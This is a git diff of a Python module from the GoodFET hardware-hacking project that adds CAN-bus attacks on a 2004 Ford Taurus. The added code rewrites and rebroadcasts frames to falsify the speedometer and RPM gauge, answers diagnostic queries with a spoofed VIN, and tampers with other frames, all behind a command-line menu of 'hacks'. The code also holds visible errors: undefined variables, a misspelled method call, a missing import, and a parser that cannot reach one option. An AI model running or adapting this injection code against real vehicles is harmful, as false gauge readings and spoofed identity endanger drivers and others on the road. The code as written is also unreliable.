X-Git-Url: http://git.rot13.org/?p=goodfet;a=blobdiff_plain;f=client%2FFordExperiments.py;h=cf70b8ac4246c47018c77eba530ec0e638727b71;hp=2baf55133cd6751e49fb8deaba3afbb7eba930fc;hb=34be758fc20244fe47823652172ba620f3ad5faf;hpb=d08bfd3c7cdc687fd68ba9025702c262665e52d3 diff --git a/client/FordExperiments.py b/client/FordExperiments.py index 2baf551..cf70b8a 100644 --- a/client/FordExperiments.py +++ b/client/FordExperiments.py @@ -6,22 +6,27 @@ import datetime import os from random import randrange from GoodFETMCPCAN import GoodFETMCPCAN; +from experiments import experiments from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication from intelhex import IntelHex; import Queue import math tT = time -class FordExperiments(GoodFETMCPCANCommunication): - - def init(self): - super(FordExperimetns,self).__init__(self) #initialize chip +class FordExperiments(experiments): + """ + This class is a subclass of experiments and is a car specific module for + demonstrating and testing hacks. + """ + def __init__(self, dataLocation = "../../contrib/ThayerData/"): + GoodFETMCPCANCommunication.__init__(self, dataLocation) + #super(FordExperiments,self).__init__(self) #initialize chip self.freq = 500; def mimic1056(self,packetData,runTime): #setup chip self.client.serInit() - self.spitSetup(500) + self.spitSetup(self.freq) #FIGURE out how to clear buffers self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False) packet1 = self.client.rxpacket(); @@ -114,7 +119,7 @@ class FordExperiments(GoodFETMCPCANCommunication): while( (time.time()-recieveTime) < runTime): #care about db3 or packet[8] that we want to count at the rate that it is dT = time.time()-tpast - packetValue += 1 + packetValue += 10 pV = packetValue%255 #temp = ((packetValue+1))%2 #if( temp == 1): @@ -141,6 +146,25 @@ class FordExperiments(GoodFETMCPCANCommunication): #recieveTime = time.time() return packetParsed + + def cycle4packets1279(self): + self.client.serInit() + self.spitSetup(500) + # filter on 1279 + self.addFilter([1279, 1279, 1279, 1279, 1279, 1279], verbose = False) + packetParsed = self.getBackground(1279) + packet = [] + if (packetParsed[db0] == 16): + # if it's the first of the four packets, replace the value in db7 with 83 + packetParsed[db7] = 83 + # transmit new packet + self.client.txpacket(packetParsed) + else: + # otherwise, leave it alone + # transmit same pakcet we read in + self.client.txpacket(packetParsed) + # print the packet we are transmitting + print packetParsed def oscillateTemperature(self,time): @@ -187,11 +211,176 @@ class FordExperiments(GoodFETMCPCANCommunication): print packetCount; + def fakeVIN(self): + #reset eveything on the chip + self.client.serInit() + self.reset() + duration = 20; #seconds + + listenID = 2015 + listenPacket = [2, 9, 6, 153, 153, 153, 153, 153] + responseID = 2024 + #actual response by the car + #r1 = [34, 88, 0, 0, 0, 0, 0, 0] + #r2 = [33, 75, 50, 78, 51, 46, 72, 69 ] + #r3 = [16, 19, 73, 4, 1, 70, 65, 66] + + r1 = [34, 88, 0, 0, 0, 0, 0, 0] + r2 = [33, 75, 50, 78, 51, 46, 72, 69 ] + r3 = [16, 19, 73, 160, 159, 70, 65, 66] + + #format + SIDlow = (responseID & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (responseID >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + r1[0],r1[1],r1[2],r1[3],r1[4],r1[5],r1[6],r1[7]] + packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + r2[0],r2[1],r2[2],r2[3],r2[4],r2[5],r2[6],r2[7]] + packet3 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + r3[0],r3[1],r3[2],r3[3],r3[4],r3[5],r3[6],r3[7]] + + self.multiPacketSpit(packet0 = r1, packet1 = r2, packet2 = r3, packet0rts = True, packet1rts = True, packet2rts = True) + + #filter for the correct packet + self.filterForPacket(listenID, listenPacket[0],listenPacket[1], verbose = True) + self.client.rxpacket() + self.client.rxpacket() # flush buffers if there is anything + startTime = tT.time() + while( (tT.time() -startTime) < duration): + packet = self.client.rxpacket() + if( packet != None): + sid = ord(packet[0])<<3 | ord(packet[1])>>5 + if( sid == listenID): + byte3 = ord(packet[6]) + if( byte3 == listenPacket[3]): + print "SendingPackets!" + #send packets + self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True) + + def speedometerHack(self, inputs): + + self.client.serInit() + self.spitSetup(500) + + self.addFilter([513, 513, 513]) + + SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + while(1): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + print self.client.packet2str(packet) + + print "DB4 = %02d " %ord(packet[9]) + mph = 1.617*ord(packet[9]) - 63.5 + print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph) + + # calculate our new mph and db4 value + mph = mph + inputs[0]; + newSpeed = ( mph + 63.5 ) / 1.617 + print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 1): + self.multiPacketSpit(packet0rts=True) + + def rpmHack(self, inputs): + """ + This method will increase the rpm by the given rpm amount. + + @type inputs: List + @param inputs: Single element of a list that corresponds to the amount the user + wishses to + """ + + self.client.serInit() + self.spitSetup(500) + + self.addFilter([513, 513, 513]) + + SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5 + SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0 + + while(1): + + packet = None; + + # catch a packet and check its db4 value + while (packet == None): + packet=self.client.rxpacket(); + + print self.client.packet2str(packet) + + print "DB4 = %02d " %ord(packet[5]) + rpm = 64.5*ord(packet[5]) - 61.88 + print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm) + + # calculate our new mph and db4 value + rpm = rpm + inputs[0]; + newRPM = ( rpm + 61.88 ) / 64.5 + print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm) + + + newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs + 0x08, # bit 6 must be set to 0 for data frame (1 for RTR) + # lower nibble is DLC + int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])] + + # load new packet into TXB0 and check time + self.multiPacketSpit(packet0=newPacket, packet0rts=True) + starttime = time.time() + + # spit new value for 1 second + while (time.time()-starttime < 1): + self.multiPacketSpit(packet0rts=True) + + + if __name__ == "__main__": - fe = FordExperiments(); - packetData = {} - packetData['db4'] = 4; - runTime = 100; - #fe.mimic1056(packetData, runTime) - #fe.cycledb1_1056(runTime) - fe.oscillateTemperature(runTime) + + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description='''\ + + Run Hacks on a Ford taurus 2004: + + speedometerHack + fakeVIN + rpmHack + ''') + parser.add_argument('verb', choices=['speedometerHack', 'rpmHack']); + parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None); + + + args = parser.parse_args(); + inputs = args.variable + fe = FordExperiments("../../contrib/ThayerData/"); + + if( args.verb == 'speedometerHack'): + fe.speedometerHack(inputs=inputs) + if( args.verb == 'rpmHack'): + fe.rpmHack(inputs=inputs) + elif( args.verb == 'fakeVIN'): + fe.fakeVIN() + +